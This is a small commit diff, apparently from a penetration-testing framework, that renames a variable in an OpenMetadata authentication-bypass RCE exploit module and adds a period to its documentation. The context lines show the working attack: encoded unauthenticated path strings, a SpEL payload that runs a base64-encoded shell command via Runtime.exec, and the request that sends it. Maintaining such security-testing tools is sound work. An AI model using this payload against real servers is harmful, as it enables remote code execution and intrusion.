Fourth release module and documentation

Author: h00die-gr3y

documentation/modules/exploit/linux/http/openmetadata_auth_bypass_rce.md

@@ -163,4 +163,4 @@ meterpreter > pwd
 meterpreter >
 ```
 ## Limitations
-No limitations
+No limitations.

modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb

@@ -75,7 +75,7 @@ def initialize(info = {})
 
   def execute_command(cmd, _opts = {})
     # list of paths that require no authentication
-    paths_to_skip = [
+    unauthed_paths = [
       '/api/v1;v1%2Fv1%2Fusers%2Flogin',
       '/api/v1;v1%2Fv1%2Fusers%2Fsignup',
       '/api/v1;v1%2Fv1%2Fusers%2FregistrationConfirmation',
@@ -91,7 +91,7 @@ def execute_command(cmd, _opts = {})
     cmd = "sh -c $@|sh . echo #{cmd}"
     cmd_b64 = Base64.strict_encode64(cmd)
     spel_payload = "T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(\"#{cmd_b64}\")))"
-    paths_to_skip.shuffle!.each do |path|
+    unauthed_paths.shuffle!.each do |path|
       res = send_request_cgi({
         'uri' => normalize_uri(target_uri.path, path, 'events', 'subscriptions', 'validation', 'condition', spel_payload),
         'method' => 'GET'